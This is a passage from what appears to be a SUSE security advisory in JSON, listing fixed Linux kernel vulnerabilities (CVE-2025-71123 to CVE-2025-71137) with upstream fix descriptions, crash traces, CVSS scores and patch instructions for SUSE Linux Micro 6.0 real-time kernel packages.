"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71126",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71126"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: avoid deadlock on fallback while reinjecting\n\nJakub reported an MPTCP deadlock at fallback time:\n\n WARNING: possible recursive locking detected\n 6.18.0-rc7-virtme #1 Not tainted\n --------------------------------------------\n mptcp_connect/20858 is trying to acquire lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280\n\n but task is already holding lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n other info that might help us debug this:\n Possible unsafe locking scenario:\n\n CPU0\n ----\n lock(\u0026msk-\u003efallback_lock);\n lock(\u0026msk-\u003efallback_lock);\n\n *** DEADLOCK ***\n\n May be due to missing lock nesting notation\n\n 3 locks held by mptcp_connect/20858:\n #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0\n #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0\n #2: ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n stack backtrace:\n CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full)\n Hardware name: Bochs, BIOS Bochs 01/01/2011\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_deadlock_bug.cold+0xc0/0xcd\n validate_chain+0x2ff/0x5f0\n __lock_acquire+0x34c/0x740\n lock_acquire.part.0+0xbc/0x260\n _raw_spin_lock_bh+0x38/0x50\n __mptcp_try_fallback+0xd8/0x280\n mptcp_sendmsg_frag+0x16c2/0x3050\n __mptcp_retrans+0x421/0xaa0\n mptcp_release_cb+0x5aa/0xa70\n release_sock+0xab/0x1d0\n mptcp_sendmsg+0xd5b/0x1bc0\n sock_write_iter+0x281/0x4d0\n new_sync_write+0x3c5/0x6f0\n vfs_write+0x65e/0xbb0\n ksys_write+0x17e/0x200\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7fa5627cbc5e\n Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 \u003cc9\u003e c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa\n RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001\n RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e\n RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005\n RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920\n R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c\n\nThe packet scheduler could attempt a reinjection after receiving an\nMP_FAIL and before the infinite map has been transmitted, causing a\ndeadlock since MPTCP needs to do the reinjection atomically from WRT\nfallback.\n\nAddress the issue explicitly avoiding the reinjection in the critical\nscenario. Note that this is the only fallback critical section that\ncould potentially send packets and hit the double-lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71126",
"url": "https://www.suse.com/security/cve/CVE-2025-71126"
},
{
"category": "external",
"summary": "SUSE Bug 1256755 for CVE-2025-71126",
"url": "https://bugzilla.suse.com/1256755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71126"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
